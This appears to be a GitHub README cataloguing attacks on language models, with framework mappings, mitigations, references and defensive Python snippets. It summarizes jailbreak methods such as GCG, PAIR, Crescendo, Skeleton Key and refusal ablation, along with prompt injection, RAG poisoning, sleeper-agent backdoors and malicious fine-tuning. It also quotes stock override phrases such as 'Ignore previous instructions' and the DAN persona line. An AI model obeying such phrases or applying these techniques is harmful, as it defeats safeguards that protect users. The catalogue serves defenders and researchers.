ousher/awesome-llm-attacks

 
 


Awesome LLM Attacks

A curated, framework-mapped catalog of attack techniques against Large Language Models and GenAI systems — prompt injection, jailbreaks, encoding/obfuscation, multimodal, training-phase poisoning, privacy extraction, agentic/multi-agent/MCP, availability, trust/reliability, and reasoning-model (chain-of-thought) attacks.

Every technique is cross-referenced to the major security frameworks so you can pivot between offensive taxonomy and defensive controls:

  • OWASP LLM Top 10 (LLM01–LLM10)
  • MITRE ATLAS — adversarial ML technique IDs (AML.T….)
  • OWASP Agentic Security Initiative (ASI) — agentic threats (ASI…)
  • MCP security — Model Context Protocol threats (tool poisoning, line-jumping, etc.)

Each entry: a stable LLM-ATTK-GGNN ID (GG = group 01–11, NN = technique within the group 01–99), the technique, framework mappings, a short description, mitigations, and references. Contributions welcome — see contributing.md. Licensed CC-BY-4.0.
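
The ID scheme above can be checked mechanically. The following is a minimal sketch, assuming the group numbers 01–11 map to this catalog's section headings (names shortened here); `parse_attack_id` and `AttackId` are illustrative names, not part of the repository.

```python
import re
from typing import NamedTuple

# Group numbers and short names, taken from this catalog's section headings.
GROUPS = {
    1: "Prompt Injection",
    2: "Jailbreaking & Guardrail Evasion",
    3: "Encoding, Obfuscation & Tokenizer-Layer",
    4: "Multimodal & Cross-Modal",
    5: "Training-Phase Poisoning, Backdoors & Fine-Tuning",
    6: "Privacy & Confidentiality",
    7: "System & Application Layer",
    8: "Agentic, Multi-Agent & MCP",
    9: "Availability & Resource",
    10: "Trust & Reliability",
    11: "Reasoning-Model / Chain-of-Thought",
}

ID_PATTERN = re.compile(r"LLM-ATTK-(\d{2})(\d{2})")


class AttackId(NamedTuple):
    group: int
    technique: int
    group_name: str


def parse_attack_id(text: str) -> AttackId:
    """Split an LLM-ATTK-GGNN ID into group and technique numbers."""
    match = ID_PATTERN.fullmatch(text.strip())
    if match is None:
        raise ValueError(f"not an LLM-ATTK-GGNN ID: {text!r}")
    group, technique = int(match.group(1)), int(match.group(2))
    if group not in GROUPS:
        raise ValueError(f"unknown group {group:02d} in {text!r}")
    if not 1 <= technique <= 99:
        raise ValueError(f"technique number out of range in {text!r}")
    return AttackId(group, technique, GROUPS[group])
```

A linter for contributions could call `parse_attack_id` on the first cell of every table row and reject rows whose ID does not belong to the surrounding group.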

This is a vendor-neutral knowledge base. It describes attack classes for defenders, red-teamers, and researchers — it is not exploit code. Use it to build tests, guardrails, and threat models.

Framework crosswalk (group ↔ OWASP ↔ MITRE ATLAS v5.4.0)

Per-row cells carry the specific IDs; this maps each group to the frameworks for orientation. OWASP ASI (Agentic Security Initiative Top 10) was published 2025-12-09; MITRE ATLAS v5.4.0 (Feb 2026) added agent-focused techniques (AI-Agent Context Poisoning, Memory Manipulation, Thread Injection, Modify AI Agent Configuration, Publish Poisoned AI Agent Tool, RAG Poisoning, False RAG Entry Injection, Escape to Host).

| Group | OWASP LLM Top 10 | OWASP ASI (2026) | MITRE ATLAS (v5.4.0) |
| --- | --- | --- | --- |
| 1 Prompt Injection | LLM01 | ASI01, ASI06 | AML.T0051; RAG Poisoning; False RAG Entry Injection |
| 2 Jailbreaking | LLM01 | | AML.T0054 (LLM Jailbreak) |
| 3 Encoding/Obfuscation | LLM01 | | AML.T0054, AML.T0043 (Craft Adversarial Data) |
| 4 Multimodal | LLM01 | ASI02 | AML.T0043 |
| 5 Poisoning/Supply-chain | LLM03, LLM04 | ASI04 | AML.T0010, AML.T0020, AML.T0018; Publish Poisoned AI Agent Tool |
| 6 Privacy & Confidentiality | LLM02, LLM07 | | AML.T0024 (Exfiltration via ML Inference) |
| 7 System & Application | LLM05 | ASI05 | Escape to Host |
| 8 Agentic/Multi-Agent/MCP | LLM06 | ASI01-03, ASI06, ASI07, ASI10 | AI-Agent Context Poisoning; Memory Manipulation; Thread Injection; Modify AI Agent Configuration |
| 9 Availability & Resource | LLM10 | ASI08 | AML.T0029 (Denial of ML Service) |
| 10 Trust & Reliability | LLM09 | ASI08, ASI09 | |
| 11 Reasoning-Model / CoT | LLM01, LLM10 | | AML.T0054 |

Group 1 — Prompt Injection (Direct, Indirect, Stored)

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0101 | Direct Prompt Injection | OWASP LLM01; ATLAS AML.T0051.000 | User input overrides system/developer instructions ("Ignore previous instructions…"). | Untrusted-input handling; instruction/context separation; external guardrails. | OWASP LLM01 |
| LLM-ATTK-0102 | Indirect Prompt Injection | OWASP LLM01; ATLAS AML.T0051.001 | Malicious instructions arrive via ingested content (web/email/doc/RAG chunk). | Segregate retrieved content; provenance; deterministic egress; disable auto-render of links/images. | OWASP LLM01 |
| LLM-ATTK-0103 | Stored / Persistent Prompt Injection | OWASP LLM01 | Payload persisted in a store, fires on later retrieval (ticket, profile, vector DB). | Treat stored data as untrusted on read; provenance; re-scan on retrieval. | OWASP LLM01 |
| LLM-ATTK-0104 | ASCII Smuggling / Invisible-Character Injection | OWASP LLM01; ATLAS AML.T0051 | Instructions in Unicode tag blocks / zero-width / bidi: invisible to humans, legible to tokenizer. | NFKC normalize + strip tag block (U+E0000–E007F), ZW, bidi before model and display. | Embrace The Red: ASCII smuggling |
| LLM-ATTK-0105 | RAG / Vector-Store Retrieval Poisoning | OWASP LLM08; OWASP LLM01 | Attacker-planted content in web/Slack/docs is embedded and later retrieved, injecting instructions across access silos (e.g. the Slack-AI case); a vector/embedding-weakness escalation of indirect injection. | Sanitize + normalize pre-embedding; namespace isolation by ACL; attribution-gated generation. | RAG security: forgotten attack surface |
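
The mitigation listed for LLM-ATTK-0104 (NFKC normalize, then strip the tag block, zero-width, and bidi characters) can be sketched with the standard library alone. This is a minimal illustration, not a complete confusables defence; the exact character set to strip is an assumption and `sanitize_untrusted_text` is a hypothetical helper name.

```python
import re
import unicodedata

# Characters removed after normalization (an assumed, non-exhaustive set).
_INVISIBLE = re.compile(
    "["
    "\U000E0000-\U000E007F"                   # Unicode tag block
    "\u200B-\u200D\u2060\uFEFF"               # zero-width space/joiners, word joiner, BOM
    "\u200E\u200F\u202A-\u202E\u2066-\u2069"  # bidi marks, embeddings, isolates
    "]"
)


def sanitize_untrusted_text(text: str) -> tuple[str, int]:
    """Return (cleaned_text, number_of_invisible_characters_removed)."""
    normalized = unicodedata.normalize("NFKC", text)
    cleaned, removed = _INVISIBLE.subn("", normalized)
    return cleaned, removed
```

A non-zero removal count is itself a useful signal: ordinary user text rarely contains tag-block characters, so a caller might log or quarantine such inputs rather than silently cleaning them. The same function should run before both the model and any display surface, as the row above notes.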

Group 2 — Jailbreaking & Guardrail Evasion

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0201 | Adversarial Suffix (GCG) | OWASP LLM01; ATLAS AML.T0054 | Gradient-optimised transferable suffix forces affirmative completion. | Perplexity/ASF filtering; SmoothLLM; intent-aware FT. | GCG: arXiv 2307.15043 |
| LLM-ATTK-0202 | AutoDAN (stealthy genetic) | OWASP LLM01; ATLAS AML.T0054 | Genetic algorithm → fluent low-perplexity jailbreaks that evade perplexity defences. | Semantic (not perplexity) classifiers; multi-signal guardrails. | AutoDAN: arXiv 2310.04451 |
| LLM-ATTK-0203 | PAIR (automated semantic refinement) | OWASP LLM01; ATLAS AML.T0054 | Attacker-LLM refines a jailbreak in ~20 black-box queries. | Behaviour analytics on iterative probing; semantic classifiers. | PAIR: arXiv 2310.08419 |
| LLM-ATTK-0204 | TAP (Tree of Attacks w/ Pruning) | OWASP LLM01; ATLAS AML.T0054 | PAIR + tree search/pruning; high black-box ASR. | As PAIR; anomaly detection on branching queries. | TAP: arXiv 2312.02119 |
| LLM-ATTK-0205 | Automated Fuzzing (GPTFuzz/JBFuzz/BEAST) | OWASP LLM01; ATLAS AML.T0054 | Fuzzing/seed-mutation mass-generates jailbreaks (JBFuzz ~99% avg ASR). | Continuous red-teaming; classifier retraining; output monitoring. | GPTFuzz: arXiv 2309.10253; JBFuzz: arXiv 2503.08990 (GPT-4o/Gemini-2.0/DeepSeek-R1) |
| LLM-ATTK-0206 | Crescendo (multi-turn escalation) | OWASP LLM01; ATLAS AML.T0054 | Benign opening then incremental escalation across turns. | Conversation-level (not turn-level) safety; cumulative-intent scoring. | Crescendo: arXiv 2404.01833 |
| LLM-ATTK-0207 | Echo Chamber (multi-turn context poisoning) | OWASP LLM01; ATLAS AML.T0054 | Indirect suggestion poisons internal context; >40% ASR all-cats, >90% for hate/violence/sexual. | Multi-turn context-integrity monitoring; semantic drift detection. | Echo Chamber: arXiv 2601.05742; NeuralTrust blog (2025-06) |
| LLM-ATTK-0208 | Deceptive Delight | OWASP LLM01; ATLAS AML.T0054 | Unsafe topic embedded in benign positive context (65% avg ASR / 3 turns). | Cumulative-intent scoring; context-window inspection. | Unit 42: Deceptive Delight (2024-10) |
| LLM-ATTK-0209 | Bad Likert Judge | OWASP LLM01; ATLAS AML.T0054 | Model coerced into grader role to emit harmful "exemplars" (~71.6% avg ASR). | Role-abuse detection; refuse self-eval of harmful exemplars. | Unit 42: Bad Likert Judge (2025-01) |
| LLM-ATTK-0210 | Policy Puppetry | OWASP LLM01; ATLAS AML.T0054 | Payload disguised as policy/config (XML/JSON/INI), leetspeak; universal across major LLMs. | Never let user content define policy; structural-format detection; external enforcement. | HiddenLayer: Policy Puppetry (2025-04) |
| LLM-ATTK-0211 | Skeleton Key | OWASP LLM01; ATLAS AML.T0054 | Convinces model to augment not replace guidelines ("add a warning but still answer"). | Guardrails independent of model self-judgement; output classifier. | Microsoft: Skeleton Key (2024-06) |
| LLM-ATTK-0212 | Context Compliance Attack | OWASP LLM01 | Forges prior assistant turns in submitted history so model "continues" compliant. | Server-side history; reject/sign client-asserted assistant turns. | Microsoft MSRC: arXiv:2503.05264 (2025-03) |
| LLM-ATTK-0213 | Roleplay / Persona (DAN class) | OWASP LLM01; ATLAS AML.T0054 | "You are DAN, you have no rules" persona dissociation. | Persona-jailbreak classifier; refusal hardening; monitoring. | JailbreakHub: arXiv 2308.03825 |
| LLM-ATTK-0214 | DeepInception (nested fiction) | OWASP LLM01; ATLAS AML.T0054 | Nested story-within-story distances the harmful request. | Recursive-context inspection; intent extraction across nesting. | DeepInception: arXiv 2311.03191 |
| LLM-ATTK-0215 | Many-shot Jailbreaking | OWASP LLM01; ATLAS AML.T0054 | Long context flooded with fabricated harmful Q&A; ICL overrides alignment. | Context-length-aware safety; demonstration-pattern detection. | Anthropic: Many-shot Jailbreaking |
| LLM-ATTK-0216 | Persuasive Adversarial Prompts (PAP) | OWASP LLM01; ATLAS AML.T0054 | Social-science persuasion taxonomies talk the model past refusal. | Persuasion-pattern classifiers; intent over framing. | PAP: arXiv 2401.06373 |
| LLM-ATTK-0217 | Refusal Suppression / Prefill / Affirmative Forcing | OWASP LLM01; ATLAS AML.T0054 | "Don't refuse / begin with 'Sure'" or prefilling the assistant turn. | Output-side classifier; block untrusted assistant prefill. | (technique family; GCG affirmative mechanic 2307.15043) |
| LLM-ATTK-0218 | Abliteration / Single Refusal-Direction Ablation | ATLAS AML.T0018 (model modification); OWASP LLM03 | Refusal is mediated by one residual-stream direction (across 13 open models ≤72B); weight-orthogonalising against it surgically disables refusal with minimal capability loss (popularised as "abliteration"). White-box. | Treat 3rd-party/uncensored weights as untrusted; provenance/signing; egress content classifier independent of the model's refusal. | arXiv 2406.11717 (NeurIPS 2024); cf. dispute 2602.02132 (mechanism only) |
| LLM-ATTK-0219 | Many-Shot Jailbreaking | OWASP LLM01 | Hundreds of fabricated in-context Q&A turns in which the model complies, overriding fine-tuned safety via in-context-learning dominance in long contexts. | Cap/penalize very long multi-shot contexts; evaluate safety over the aggregate context; flag repeated harmful exemplars. | Anthropic 2024 |
| LLM-ATTK-0220 | Policy Puppetry | OWASP LLM01; ATLAS AML.T0051 | Malicious instructions formatted as a policy/config file (XML/JSON/INI) so the model prioritizes structured metadata over safety boundaries. Universal-bypass claim is contested. | Strip/sanitize structural tags from user input; run a secondary classifier on XML/JSON intent before generation. | HiddenLayer 2025 |
| LLM-ATTK-0221 | Best-of-N (BoN) Jailbreaking | OWASP LLM01; ATLAS AML.T0054, AML.T0043 | Sample many randomly-augmented variants (casing, punctuation, ASCII, audio pitch) of a prompt; ASR scales power-law with N (~89% GPT-4o at N=10k); works across text/vision/audio. | Per-user adversarial-pattern + rate detection; output-side classifier; stochastic refusal. | Best-of-N (arXiv:2412.03556) |
| LLM-ATTK-0222 | Automated Adversarial-Suffix Optimizers (GCG / PAIR / TAP) | OWASP LLM01; ATLAS AML.T0043 | Black-box (PAIR), tree-search (TAP), and white-box gradient (GCG/AutoDAN/BEAST) optimizers that auto-generate transferable jailbreak suffixes. | Perplexity filtering; SmoothLLM; circuit-breaker / adversarial training. | GCG (arXiv:2307.15043) |
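
The Context Compliance Attack row (LLM-ATTK-0212) lists "reject/sign client-asserted assistant turns" as a mitigation. One way this could look, when the server cannot keep the history itself, is an HMAC tag on every assistant turn it emits. This is a sketch under assumptions: the message shape (`role`, `content`, `sig`) and the function names are hypothetical, and key management is out of scope.

```python
import hashlib
import hmac
import json


def sign_turn(key: bytes, conversation_id: str, index: int, content: str) -> str:
    """Tag an assistant turn, binding it to its conversation and position."""
    message = json.dumps([conversation_id, index, content], separators=(",", ":"))
    return hmac.new(key, message.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_history(key: bytes, conversation_id: str, history: list[dict]) -> list[dict]:
    """Return the history without signatures, or raise if an assistant turn is forged."""
    verified = []
    for index, turn in enumerate(history):
        if turn["role"] == "assistant":
            expected = sign_turn(key, conversation_id, index, turn["content"])
            supplied = str(turn.get("sig", ""))
            # Compare as bytes so attacker-supplied non-ASCII text cannot raise TypeError.
            if not hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
                raise ValueError(f"unsigned or forged assistant turn at index {index}")
        verified.append({"role": turn["role"], "content": turn["content"]})
    return verified
```

Binding the tag to the turn index and conversation ID keeps a genuine assistant turn from being replayed in a different position or conversation. Storing history server-side, the other mitigation in that row, avoids the problem entirely and is usually simpler.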

Group 3 — Encoding, Obfuscation & Tokenizer-Layer Attacks

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0301 | Encoding / Cipher (Base64/ROT13/hex/Morse/braille/atbash) | OWASP LLM01; ATLAS AML.T0054 | Harmful intent encoded so filters miss it; model decodes and complies. | Decode-then-scan; classify on decoded text. | (encoding family; CipherChat) |
| LLM-ATTK-0302 | CipherChat | OWASP LLM01; ATLAS AML.T0054 | Whole conversation in a cipher the model uses but the safety layer can't read. | Cipher detection; refuse unverified ciphers; decode-then-classify. | CipherChat: arXiv 2308.06463 |
| LLM-ATTK-0303 | Low-Resource-Language Translation | OWASP LLM01; ATLAS AML.T0054 | Safety alignment weaker in low-resource languages. | Multilingual classifiers; translate-to-English inspection; parity testing. | arXiv 2310.02446 |
| LLM-ATTK-0304 | ArtPrompt (ASCII art) | OWASP LLM01; ATLAS AML.T0054 | Trigger words drawn as ASCII art evade keyword filters. | Visual/ASCII-art detection; reconstruct-then-classify. | ArtPrompt: arXiv 2402.11753 |
| LLM-ATTK-0305 | Payload Splitting / Token Smuggling | OWASP LLM01; ATLAS AML.T0054 | Harmful instruction assembled from benign fragments at inference. | Whole-context intent reconstruction; variable-assembly detection. | (token smuggling family) |
| LLM-ATTK-0306 | Homoglyph / Zero-Width / Bidi Obfuscation | OWASP LLM01; ATLAS AML.T0054 | Confusable/invisible chars break filters, preserve model semantics. | NFKC, homoglyph fold, ZW/bidi strip before classification. | (see LLM-ATTK-0104) |
| LLM-ATTK-0307 | TokenBreak (tokenizer manipulation) | OWASP LLM01; ATLAS AML.T0054 | Manipulates subword tokenisation so a guard mis-tokenises text the target understands. | Align guard tokenizer; perturbed-token training; multiple tokenizers. | HiddenLayer: TokenBreak, arXiv 2506.07948 |
| LLM-ATTK-0308 | Glitch / Anomalous Tokens | ATLAS AML.T0054 | Under-trained tokens cause unstable/unaligned behaviour. | Tokenizer hygiene; anomalous-token blocklists; vocab auditing. | (glitch-token research) |
| LLM-ATTK-0309 | Special / Chat-Template Token Injection | OWASP LLM01 | Injecting chat control tokens (im_start / system / end-of-sequence markers) to forge role boundaries in the template. | Escape/strip special tokens in untrusted input; structured assembly. | (chat-template injection family) |
| LLM-ATTK-0310 | FlipAttack | OWASP LLM01 | Reverse or permute the characters/words of a harmful prompt and instruct the model to restore and execute it, evading token-level filters. | Decode/normalize before classification; run semantic evaluation on the reconstructed text. | FlipAttack (arXiv:2410.02832) |
| LLM-ATTK-0311 | MathPrompt (Symbolic Mathematics) | OWASP LLM01 | Encode harmful intent as symbolic math / set-theory; the model decodes it while solving, bypassing NLP safety filters (reported ~73.6% ASR). | Semantic safety evaluation on the decoded symbolic representation; dual-stage analysis of dense math inputs. | Symbolic Math Jailbreak (arXiv:2409.11445) |
| LLM-ATTK-0312 | ArtPrompt (ASCII-Art Jailbreak) | OWASP LLM01; ATLAS AML.T0054 | Replace blocked keywords with ASCII art the model decodes but the safety filter does not. | Visual-in-text pre-classifier; OCR-then-filter the resolved plaintext. | ArtPrompt (arXiv:2402.11753) |
| LLM-ATTK-0313 | Cipher / Low-Resource-Language Jailbreak | OWASP LLM01 | Caesar/Base64/Morse ciphers, code-switching, or low-resource languages (Zulu, Hmong) carry harmful intent past English-aligned filters. | Language-aware safety filters; translate-then-classify; safety fine-tune across long-tail languages. | Low-Resource Lang Jailbreak (arXiv:2310.02446) |
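
Several rows in this group share the "decode-then-scan" mitigation. A minimal sketch of that idea follows: generate a handful of candidate decodings of an untrusted input, then run the same safety classifier over each one. The set of decoders (Base64, ROT13, hex, character reversal) is an assumed subset, and `classifier` stands in for whatever content classifier a deployment already uses.

```python
import base64
import binascii
import codecs
from typing import Callable


def candidate_decodings(text: str) -> dict[str, str]:
    """Return the raw text plus every decoding that succeeds (assumed decoder set)."""
    candidates = {"raw": text}
    candidates["rot13"] = codecs.decode(text, "rot_13")
    compact = "".join(text.split())  # tolerate whitespace inside encoded payloads
    try:
        candidates["base64"] = base64.b64decode(compact, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        pass  # not valid Base64, or not UTF-8 once decoded
    try:
        candidates["hex"] = bytes.fromhex(compact).decode("utf-8")
    except ValueError:
        pass  # not valid hex, or not UTF-8 once decoded
    candidates["reversed"] = text[::-1]  # character-reversal variant of FlipAttack
    return candidates


def flag_decodings(text: str, classifier: Callable[[str], bool]) -> list[str]:
    """Names of the decodings that the classifier flags as unsafe."""
    return [name for name, decoded in candidate_decodings(text).items() if classifier(decoded)]
```

For example, with a toy classifier such as `lambda s: "blocked phrase" in s.lower()`, the ROT13 input `"oybpxrq cuenfr"` is flagged under `"rot13"` while the raw text passes. A fixed decoder list cannot cover nested or custom ciphers (CipherChat, MathPrompt), which is why the rows above pair it with semantic classification on the output side.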

Group 4 — Multimodal & Cross-Modal Attacks

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0401 | Image-Embedded Text Injection | OWASP LLM01 | Instructions written into an image bypass text-only filters. | Per-modality sanitisation; OCR-then-classify; dual-LLM isolation. | OWASP LLM01 (multimodal) |
| LLM-ATTK-0402 | FigStep (typographic visual jailbreak) | OWASP LLM01; ATLAS AML.T0054 | Prohibited content as typographic images bypasses LVLM alignment. | Visual safety classifier; OCR + intent extraction. | FigStep: arXiv 2311.05608 |
| LLM-ATTK-0403 | Adversarial-Perturbation / Patch (CrossInject) | OWASP LLM01 | Gradient noise/patches shift vision-encoder reps to malicious targets (+30.1% ASR). | Robust vision encoders; input transformation; output validation. | CrossInject: arXiv 2504.14348 (ACM MM 2025) |
| LLM-ATTK-0404 | Steganographic Prompt Injection | OWASP LLM01 | Instructions hidden via stego in images/audio; max ~67% ASR (GPT-4o) in medical VLMs. | Steganalysis; modality sanitisation; media provenance/signing. | Clusmann et al., Nat. Commun. 16:1239 (2025), DOI 10.1038/s41467-024-55631-x |
| LLM-ATTK-0405 | Cross-Modal Agent Injection (AgentTypo) | OWASP LLM01; ASI01 | Optimised text in webpage images drives multimodal agents (image-only ASR 23→45%). | Screenshot sanitisation; tool-output isolation; HITL on high-impact. | AgentTypo: arXiv 2510.04257 |
| LLM-ATTK-0406 | Audio / Video Prompt Injection | OWASP LLM01 | Instructions in audio/video processed before any text filter. | Per-modality transcription + classification; modality isolation. | C. Schneider: multimodal PI |
| LLM-ATTK-0407 | Cross-Modal Prompt Injection (CrossInject) | OWASP LLM01; ATLAS AML.T0051 | Jointly optimized adversarial image (visual-latent alignment) plus appended text that hijack a multimodal agent; reported +30% ASR over unimodal injection. | Cross-modal consistency checks; validate vision-decoded intent against text intent before aggregation. | CrossInject (arXiv:2504.14348) |

Group 5 — Training-Phase Poisoning, Backdoors & Fine-Tuning

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0501 | Training Data Poisoning | OWASP LLM04; ATLAS AML.T0020 | Manipulating training/embedding data to implant bias/backdoor. | Data provenance/ML-BOM; vendor vetting; anomaly detection. | OWASP LLM04 |
| LLM-ATTK-0502 | Backdoor / Trigger Attack | OWASP LLM04; ATLAS AML.T0018 | Hidden weight trigger fires malicious action; small poison fractions suffice. | CLEANGEN; SANDE; weight merging; trigger detection. | survey: arXiv 2406.06852 |
| LLM-ATTK-0503 | Sleeper Agents / Deceptive Alignment | OWASP LLM04; ATLAS AML.T0018 | Backdoors persist through RLHF; defect on trigger. | Provenance; interpretability probes; treat 3rd-party weights as untrusted. | Sleeper Agents: arXiv 2401.05566 |
| LLM-ATTK-0504 | RAG / Knowledge-Base Poisoning (PoisonedRAG) | OWASP LLM08; ASI06; ATLAS AML.T0020 | A few malicious docs steer RAG answers (~90% ASR w/ ~5 docs). | Source vetting on ingest; retrieval anomaly detection; content signing. | PoisonedRAG: arXiv 2402.07867 |
| LLM-ATTK-0505 | Malicious Fine-Tuning / Shadow Alignment | OWASP LLM03/04; ATLAS AML.T0018 | FaaS abused; small harmful sets strip alignment. Canonical demo: Qi et al., fine-tuning GPT-3.5 Turbo on ~10 adversarial examples for <$0.20 via the FT-API removes guardrails. | Screen FT data; post-tune safety evals; alignment-preservation. | Shadow Alignment: arXiv 2310.02949; Qi et al. (FT-API harm): arXiv 2310.03693 (ICLR 2024 oral) |
| LLM-ATTK-0506 | Benign-Data Overfitting Jailbreak | OWASP LLM04; ATLAS AML.T0018 | Overfit-then-defit on benign QA erases refusals; no harmful sample to detect. Adjacent (distinct axis): unintended alignment erosion, where fine-tuning on ordinary benign datasets (Alpaca/Dolly/LLaVA) with NO malicious intent also degrades safety (lesser extent; Qi et al. 2310.03693, He et al. 2404.01099). | Behavioural post-tune evals; refusal-retention checks. | Attack via Overfitting: arXiv 2510.02833; arXiv 2404.01099 / 2505.06843 |
| LLM-ATTK-0507 | Adapter / LoRA Backdoor (supply chain) | OWASP LLM03; ASI04; ATLAS AML.T0018 | Shared LoRA/adapter embeds a backdoor on load. | Vet/sign adapters; ML-BOM; integrity hashes; sandboxed eval. | OWASP LLM03; ASI04 |
| LLM-ATTK-0508 | Emergent Misalignment | OWASP LLM04; ATLAS AML.T0018 | Narrow finetune on a single specialised, non-overtly-harmful task (insecure code w/o disclosure) induces broad misalignment across unrelated domains; strongest GPT-4o / Qwen2.5-Coder-32B. Has a hidden/selective trigger variant. Distinct from deliberate malicious FT. | Screen narrow-task FT data; broad-domain post-tune safety evals; trigger probing. | arXiv 2502.17424 (ICML 2025); reasoning-model variant 2506.13206 |
| LLM-ATTK-0509 | Jailbreak-Tuning | OWASP LLM03/04; ATLAS AML.T0018 | Couples malicious FT with a matching inference-time jailbreak/trigger; bypasses commercial FT-API moderation at ~2% harmful:benign poisoning (down to ~0.2% / ~10 examples). | FT-data moderation that accounts for trigger-coupling; low-poison-rate detection; post-tune red-team with the trigger. | arXiv 2507.11630 (FAR.AI, Jul 2025); cf. scaling 2408.02946 |
| LLM-ATTK-0510 | Covert Malicious Finetuning (CMFT) | OWASP LLM03/04; ATLAS AML.T0018 | Teaches the model to read/respond in an encoding via training data where every individual datapoint looks innocuous, evading dataset inspection, safety evals, and I/O classifiers; GPT-4 acts on harmful instructions 99% of the time. Distinct evasion sub-technique of 054. | Encoding/format anomaly detection on FT data; holistic (not per-datapoint) dataset analysis; decode-then-scan I/O. | arXiv 2406.20053 (ICML 2024) |
| LLM-ATTK-0511 | Model-Merging Backdoors (Merge Hijacking) | OWASP LLM03; OWASP LLM04 | A malicious task vector / adapter is optimized to survive arithmetic model merging (SLERP, task arithmetic), implanting a backdoor that activates only after merge. | Cryptographic provenance for task vectors/adapters; post-merge adversarial robustness evaluation. | Merge Hijacking (arXiv:2505.23561) |
| LLM-ATTK-0512 | Malicious Model Files / Pickle Deserialization | OWASP LLM03; OWASP LLM05 | Arbitrary code execution via pickle/serialized payloads embedded in shared model weights pulled from hubs. | Use safetensors; scan/deny unsafe pickle opcodes; sandbox model loading; verify publisher signatures. | Trail of Bits: pickle attacks |
| LLM-ATTK-0513 | Model Namespace Reuse / Conversion-Service Hijack | OWASP LLM03; ATLAS AML.T0010 | Re-register a deleted/transferred model namespace so catalogs (Azure AI Foundry, Vertex AI) re-pull a poisoned model at the original path. | Pin to revision/SHA; AI-BOM; signature verification. | Unit 42: Model Namespace Reuse |
| LLM-ATTK-0514 | AgentPoison (Backdoored RAG Memory) | OWASP LLM04; OWASP LLM08; ATLAS RAG Poisoning | Constrained-optimization triggers cluster malicious docs in an agent's memory/RAG embedding space; >80% ASR at <0.1% poison rate. | Embedding-cluster anomaly detection; provenance gating on ingested experiences. | AgentPoison (arXiv:2407.12784) |
| LLM-ATTK-0515 | False RAG Entry Injection / RAG Credential Harvesting | OWASP LLM02; OWASP LLM08; ATLAS | Insert a fake authoritative RAG entry, or have the agent search its store for inadvertently-ingested secrets (newly-minted MITRE ATLAS techniques). | Secret-detection at ingestion; per-document access labels; refuse credential-shaped output. | MITRE ATLAS |
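
The "scan/deny unsafe pickle opcodes" mitigation for LLM-ATTK-0512 can be illustrated with the standard-library `pickletools` module, which walks a pickle stream without executing it. This is a sketch only: the opcode deny-list below is an assumption, and many legitimate pickles (any pickled class instance, including typical model checkpoints) also use these opcodes, so a practical scanner would allowlist specific imports instead of denying all of them.

```python
import pickletools

# Opcodes that import or call objects during unpickling (assumed deny-list).
UNSAFE_OPCODES = frozenset(
    {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
)


def unsafe_pickle_opcodes(data: bytes) -> set[str]:
    """List deny-listed opcodes in a pickle stream without unpickling it."""
    found = set()
    for opcode, _argument, _position in pickletools.genops(data):
        if opcode.name in UNSAFE_OPCODES:
            found.add(opcode.name)
    return found


def is_plain_data_pickle(data: bytes) -> bool:
    """True if the stream only builds containers and primitives."""
    return not unsafe_pickle_opcodes(data)
```

A pickle of plain dicts, lists, strings, and numbers passes this check, while one whose `__reduce__` returns a callable such as `os.system` is reported with `REDUCE`. Where possible, the safer route named in the same row is to avoid pickle altogether and load weights from safetensors files.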

Group 6 — Privacy & Confidentiality

| ID | Technique | Framework | Description | Mitigation | References |
| --- | --- | --- | --- | --- | --- |
| LLM-ATTK-0601 | Sensitive Information Disclosure | OWASP LLM02; ATLAS AML.T0057 | Model reveals private data from memorisation/context. | Output PII filtering; access controls; DP. | OWASP LLM02 |
| LLM-ATTK-0602 | System Prompt Leakage | OWASP LLM07; ATLAS AML.T0051.000 | Model discloses its system prompt/rules/secrets. | Never store secrets in prompts; externalise logic; external guardrails. | OWASP LLM07 |
| LLM-ATTK-0603 | Training-Data Extraction (Divergence) | OWASP LLM02; ATLAS AML.T0024/T0057 | "Repeat 'poem' forever" emits verbatim memorised data. | Output repetition/divergence detection; DP; rate limits. | Carlini et al.: arXiv 2311.17035 |
| LLM-ATTK-0604 | Model Inversion (Reconstruction) | OWASP LLM02; ATLAS AML.T0024 | Reconstruct training inputs from model/gradient access. | DP; FL; gradient clipping/noise. | survey: arXiv 2411.10023 |
| LLM-ATTK-0605 | Membership Inference (MIA) | OWASP LLM02; ATLAS AML.T0024 | Determine if a record was in training via loss/perplexity. | DP; reduce memorisation; confidence calibration. | arXiv 2402.07841 |
| LLM-ATTK-0606 | Attribute Inference | OWASP LLM02 | Infer undisclosed attributes from outputs. | Output filtering; minimise inferable signals; DP. | (attribute-inference literature) |
| LLM-ATTK-0607 | Model Theft / Extraction | OWASP LLM10 (adj.); ATLAS AML.T0048 | Bulk-query a model to train a copycat. | Rate limiting; behavioural analytics; watermarking. | survey: arXiv 2506.22521 |
| LLM-ATTK-0608 | Embedding Inversion (RAG) | OWASP LLM08 | Reconstruct source text from stored embeddings. | Permission-aware vector access; embedding obfuscation. | OWASP LLM08 |
| LLM-ATTK-0609 | Inference Side-Channel (timing / token-length) | OWASP LLM02 | Leak content via streaming token-length/timing. | Token batching/padding; constant-size streaming; jitter. | arXiv 2403.09751 ("Remote Keylogging Attack on AI Assistants") |
| LLM-ATTK-0610 | PLeak (Optimized System-Prompt Leakage) | OWASP LLM07; ATLAS AML.T0024 | Algorithmically generate universal 'leak prompts' that reliably extract a hidden system prompt. | System-prompt redaction; output filter against system-prompt regurgitation. | PLeak (Trend Micro) |
| LLM-ATTK-0611 | Scalable Training-Data Extraction | OWASP LLM02; ATLAS AML.T0024 | Divergence/prefix attacks extract verbatim memorized PII and training data from aligned production models. | Training-data dedup; output detection of memorized strings; differential privacy at fine-tune. | Carlini et al. (arXiv:2311.17035) |
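
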